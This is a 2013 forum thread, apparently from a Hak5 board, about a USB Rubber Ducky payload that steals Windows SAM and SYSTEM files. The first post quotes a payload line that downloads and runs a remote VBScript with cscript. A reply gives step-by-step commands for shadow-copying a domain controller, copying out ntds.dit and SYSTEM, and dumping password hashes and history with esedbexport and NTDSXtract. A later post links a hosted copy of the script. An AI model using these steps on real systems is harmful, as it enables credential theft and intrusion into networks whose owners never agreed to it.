Kudzu_Kid Posted April 23, 2013 Posted April 23, 2013 I was looking at the payload scripts for my Ducky. I found one that I was looking for. It's the "Payload retrieve sam and system from a live file system" script featured here:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---retrieve-sam-and-system-from-a-live-file-systemNaturally, I have an issue with it. The script has a line that says:"STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs"Nothing in my life is easy! %^} So, naturally http://tools.lanmaster53.com seems to be off the air right now.So, I think this will be ok, I'll use my friend Google and find the script elsewhere, and then just edit the script to point to the new URL, once I find one.The problem now is, I see vssown.vbs scattered on a few different sites, acredited to the same author everywhere I see it - yet when I look at the source, the script appears to be remarkably different in more than one location. Sooo, my qiestions are:1) Does anyone actually have this scriot WORKING? 2) May I have a copy of it? Feel free to edit out any sensitive info if you must - directory names, etc. But please make it crystal clear what information what should be there... eg; "c:/windows/somedirecoty/somewhere/acme.exe" or whatever.In essence, all I want to do is get the hash on the Ducky and test it for integrity later. .All help, hints, tips appreciated.Thanks,Kudzu Quote
no42 Posted April 23, 2013 Posted April 23, 2013 Step 1: Create Shadow Copy Drive (native command)Creating the Shadowcopy of the drive CONTAINING the ntds.dit file (generally C: drive but could be somewhere else if the file is big): vssadmin create shadow /for=[drive letter:] Step 2: List Drives (native command)Check the path to the Shadowcopy Copy Volume, i.e \\?GLOBALROOT|device... vssadmin list shadows Step 3: Copy Files (native command)Copy the NTDS.dit and SYSTEM files out of the Volume(s): copy \\?GLOBALROOT|device[...]ntdis.dit and \\?GLOBALROOT|device[...]SYSTEM to your machine Step 4: Crack the HashGet the libesedb libraries from: http://code.google.com/p/libesedb/downloads/listExtract and compile the libesedb libraries [./configure, make, make install, ldconfig] Get the NTDSXtract framework - http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip After installing the libesedb libraries, extract the database tables from ntds.dit: esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file> Extract the hashes/user info/password history: python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output Convert to pwdump format the output: python ntdstopwdump.py /tmp/ntds.dit.output Quote
skysploit Posted May 3, 2013 Posted May 3, 2013 Here's a link to the actual VSSOwn: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs Here's LANMaster53's site: http://lanmaster53.com/ Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.